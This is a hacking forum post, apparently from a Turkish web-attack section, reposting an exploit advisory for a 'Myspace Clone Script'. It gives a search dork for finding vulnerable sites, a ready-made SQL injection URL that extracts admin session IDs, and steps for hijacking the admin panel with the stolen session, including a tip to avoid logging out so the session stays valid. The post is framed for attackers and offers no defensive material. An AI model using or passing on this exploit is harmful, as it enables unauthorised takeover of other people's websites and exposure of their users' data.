folder Tahribat.com Forumları
linefolder Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
linefolder Myspace Clone Script SQL Injection Vulnerabilitys



Myspace Clone Script SQL Injection Vulnerabilitys

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Chip
    Chip's avatar
    Kayıt Tarihi: 13/Eylül/2007
    Erkek
    --==+================================================================================+==--
    --==+ Myspace Clone Script SQL Injection Vulnerabilitys +==--
    --==+================================================================================+==--



    AUTHOR: t0pP8uZz & xprog
    SITE: datecomm.com
    DORK (altavista.com): "Search | Invite | Mail | Blog | Forum"


    DESCRIPTION:
    pull admin session id's from the database, then visit admin area.


    EXPLOITS:
    index.php?pg=forums&s=viewcat&seid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,sess_id,7,8,9,10/**/FROM/**/admin/*


    NOTE/TIP:
    after executing the Injection you will see a SessionID.

    Use the session id in the below URL:
    admin.php?pg=users&adsess=SESSION_ID

    example:
    http://www.site.com/admin.php?pg=users&adsess=54f824ebcde36ee8844c103d97412123

    Do Not Click Logout! as it will delete the sessionid from the DB.


    GREETZ: milw0rm.com, H4CK-Y0u.org, CipherCrew.org!


    --==+================================================================================+==--
    --==+ Myspace Clone Script SQL Injection Vulnerabilitys +==--
    --==+================================================================================+==-
Toplam Hit: 927 Toplam Mesaj: 1